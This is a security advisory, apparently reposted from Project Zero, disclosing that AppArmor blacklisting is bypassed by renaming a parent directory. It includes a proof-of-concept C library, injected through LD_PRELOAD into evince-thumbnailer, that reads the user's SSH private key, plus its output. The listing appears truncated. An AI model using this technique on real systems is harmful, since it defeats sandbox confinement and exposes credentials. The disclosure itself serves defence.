AppArmor Filesystem Blacklisting Bypass

AppArmor has an issue where filesystem blacklisting can be bypassed by moving parents.

MD5 | 639fa99eb3859f6045557741289c460b

AppArmor: filesystem blacklisting can be bypassed by moving parents 

Some AppArmor policies attempt to blacklist access to specific directories while broadly granting write access to everything else. For example, the Firefox profile uses the user-files abstraction, which broadly permits write access to owned files under /home while using the private-files abstraction to block access to some files like ~/.bashrc. Similar thing for the evince thumbnailer.

This is broken because if an attacker has write access to ~/.ssh/, but access to ~/.ssh/** is blocked, it is possible to rename ~/.ssh to ~/.ssh_, access ~/.ssh_/id_rsa, and rename ~/.ssh_ back to ~/.ssh.

Demo with evince:

user@ubuntu-18-04-vm:~/evince_thumbnailer_apparmor$ cat preload5.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>

__attribute__((constructor)) static void entry(void) {
printf("constructor running from %s\n", program_invocation_name);

errno = 0;
int fd = open("/home/user/.ssh/id_rsa", O_RDONLY);
printf("open id_rsa direct: %d, error = %m\n", fd);

if (rename("/home/user/.ssh", "/home/user/.sshx"))
err(1, "rename");

errno = 0;
fd = open("/home/user/.sshx/id_rsa", O_RDONLY);
printf("open id_rsa indirect: %d, error = %m\n", fd);

if (rename("/home/user/.sshx", "/home/user/.ssh"))
err(1, "rename2");

char buf[1001];
errno = 0;
int res = read(fd, buf, 1000);
printf("read res: %d, error = %m\n", res);
if (res > 0) {
buf[res] = 0;

user@ubuntu-18-04-vm:~/evince_thumbnailer_apparmor$ sudo gcc -shared -o /usr/lib/x86_64-linux-gnu/ preload5.c -fPIC && LD_PRELOAD=/usr/lib/x86_64-linux-gnu/ evince-thumbnailer
constructor running from evince-thumbnailer
open id_rsa direct: -1, error = Permission denied
open id_rsa indirect: 3, error = Success
read res: 1000, error = Success

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: jannh

Related Posts